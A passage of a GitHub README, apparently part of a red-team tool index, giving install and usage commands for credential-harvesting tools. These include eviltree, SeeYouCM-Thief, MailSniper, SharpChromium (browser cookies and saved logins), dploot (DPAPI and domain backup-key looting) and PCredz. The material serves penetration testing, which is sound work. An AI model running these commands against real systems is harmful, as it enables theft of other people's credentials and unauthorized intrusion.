100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/helpsystems/nanodump\"\u003ehttps://github.com/helpsystems/nanodump\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" 
class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/t3l3machus/eviltree\"\u003eeviltree\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-eviltree\" class=\"anchor\" aria-label=\"Permalink: 🔙eviltree\" href=\"#eviltree\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA standalone python3 remake of the classic \"tree\" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eWhile searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003etree\u003c/code\u003e is an amazing tool for analyzing directory structures. 
It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/t3l3machus/eviltree\"\u003e\u003cpre\u003egit clone https://github.com/t3l3machus/eviltree\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Running a regex that essentially matches strings similar to: password = something against /var/www\npython3 eviltree.py -r /var/www -x \u0026quot;.{0,3}passw.{0,3}[=]{1}.{0,18}\u0026quot; -v\n\n# Using comma separated keywords instead of regex\npython3 eviltree.py -r C:\\Users\\USERNAME -k passw,admin,account,login,user -L 3 -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Running a regex that essentially matches strings similar to: password = something against /var/www\u003c/span\u003e\npython3 eviltree.py -r /var/www -x \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e.{0,3}passw.{0,3}[=]{1}.{0,18}\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -v\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Using comma separated keywords instead of regex\u003c/span\u003e\npython3 eviltree.py -r C:\u003cspan class=\"pl-cce\"\u003e\\U\u003c/span\u003esers\u003cspan class=\"pl-cce\"\u003e\\U\u003c/span\u003eSERNAME -k passw,admin,account,login,user -L 3 
-v\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/t3l3machus/eviltree\"\u003ehttps://github.com/t3l3machus/eviltree\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/trustedsec/SeeYouCM-Thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-seeyoucm-thief\" class=\"anchor\" aria-label=\"Permalink: 🔙SeeYouCM-Thief\" href=\"#seeyoucm-thief\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSimple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWill also 
optionally enumerate active directory users from the UDS API.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\" rel=\"nofollow\"\u003eBlog - Exploiting common misconfigurations in cisco phone systems\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/trustedsec/SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/trustedsec/SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Enumerate Active Directory users from the UDS api on the CUCM\n./thief.py -H \u0026lt;CUCM server\u0026gt; --userenum\n\n# Without specifying a phone IP address the script will attempt to download every config in the listing.\n./thief.py -H \u0026lt;Cisco CUCM Server\u0026gt; [--verbose]\n\n# Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.\n./thief.py --phone \u0026lt;Cisco IP Phoner\u0026gt; [--verbose]\n\n# Specify a subnet to scan with reverse lookups.\n./thief.py --subnet \u0026lt;subnet to scan\u0026gt; [--verbose]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerate Active Directory users from the UDS api on the CUCM\u003c/span\u003e\n./thief.py -H \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCUCM server\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e 
--userenum\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Without specifying a phone IP address the script will attempt to download every config in the listing.\u003c/span\u003e\n./thief.py -H \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCisco CUCM Server\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.\u003c/span\u003e\n./thief.py --phone \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCisco IP Phoner\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Specify a subnet to scan with reverse lookups.\u003c/span\u003e\n./thief.py --subnet \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003esubnet to scan\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\" rel=\"nofollow\"\u003ehttps://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dafthack/MailSniper\"\u003eMailSniper\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mailsniper\" class=\"anchor\" aria-label=\"Permalink: 🔙MailSniper\" href=\"#mailsniper\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). 
It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMore information is available in the \u003ca href=\"https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/\" rel=\"nofollow\"\u003eBlack Hills Infosec blog post introducing MailSniper\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"http://www.dafthack.com/files/MailSniper-Field-Manual.pdf\" rel=\"nofollow\"\u003eMailSniper Field Manual\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module MailSniper.ps1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module MailSniper.ps1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Search current users mailbox\nInvoke-SelfSearch -Mailbox current-user@domain.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Search current users mailbox\u003c/span\u003e\nInvoke-SelfSearch -Mailbox current-user@domain.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" 
rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://patrowl.io/\" rel=\"nofollow\"\u003ehttps://patrowl.io/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/djhohnstein/SharpChromium\"\u003eSharpChromium\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpchromium\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpChromium\" href=\"#sharpchromium\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. 
Currently, it can extract:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eCookies (in JSON format)\u003c/li\u003e\n\u003cli\u003eHistory (with associated cookies for each history item)\u003c/li\u003e\n\u003cli\u003eSaved Logins\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eThis rewrite has several advantages to previous implementations, which include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eNo Type compilation or reflection required\u003c/li\u003e\n\u003cli\u003eCookies are displayed in JSON format, for easy importing into Cookie Editor.\u003c/li\u003e\n\u003cli\u003eNo downloading SQLite assemblies from remote resources.\u003c/li\u003e\n\u003cli\u003eSupports major Chromium browsers (but extendable to others)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/downloads/\" rel=\"nofollow\"\u003eVisual Studio Community Edition\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen up the project .sln, choose \"release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Retrieve cookies associated with Google Docs and Github\n.\\SharpChromium.exe cookies docs.google.com github.com\n\n# Retrieve history items and their associated cookies.\n.\\SharpChromium.exe history\n\n# Retrieve saved logins (Note: Only displays those with non-empty passwords):\n.\\SharpChromium.exe logins\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve cookies associated with Google Docs and Github\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe cookies docs.google.com 
github.com\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve history items and their associated cookies.\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe \u003cspan class=\"pl-c1\"\u003ehistory\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve saved logins (Note: Only displays those with non-empty passwords):\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe logins\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/djhohnstein/SharpChromium\"\u003ehttps://github.com/djhohnstein/SharpChromium\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/zblurx/dploot\"\u003edploot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dploot\" class=\"anchor\" aria-label=\"Permalink: 🔙dploot\" href=\"#dploot\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 
2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault, etc.) we just need access to a password.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003edploot is a Python rewrite of SharpDPAPI, written in C# by Harmj0y, which is itself a port of the DPAPI logic from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable from a Python interpreter and from a Linux environment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107\" rel=\"nofollow\"\u003eBlog - Operational Guidance for Offensive User DPAPI Abuse\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install dploot\"\u003e\u003cpre\u003epip install dploot\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/zblurx/dploot.git\ncd dploot\nmake\"\u003e\u003cpre\u003egit clone https://github.com/zblurx/dploot.git\n\u003cspan 
class=\"pl-c1\"\u003ecd\u003c/span\u003e dploot\nmake\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Loot decrypted machine private key files as a Windows local administrator \ndploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet\n\n# Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)\ndploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet\n\n# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\ndploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet \"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loot decrypted machine private key files as a Windows local administrator \u003c/span\u003e\ndploot machinecertificates -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.14 -quiet\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)\u003c/span\u003e\ndploot backupkey -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.112 -quiet\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the DPAPI 
backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\u003c/span\u003e\ndploot certificates -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.14 -pvk key.pvk -quiet \u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eDiscovery\u003c/h1\u003e\u003ca id=\"user-content-discovery\" class=\"anchor\" aria-label=\"Permalink: Discovery\" href=\"#discovery\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/lgandx/PCredz\"\u003ePCredz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pcredz\" class=\"anchor\" aria-label=\"Permalink: 🔙PCredz\" href=\"#pcredz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 
0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/lgandx/PCredz\"\u003e\u003cpre\u003egit clone https://github.com/lgandx/PCredz\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (PCAP File Folder)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./Pcredz -d /tmp/pcap-directory-to-parse/\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ePcredz\u003c/span\u003e \u003cspan 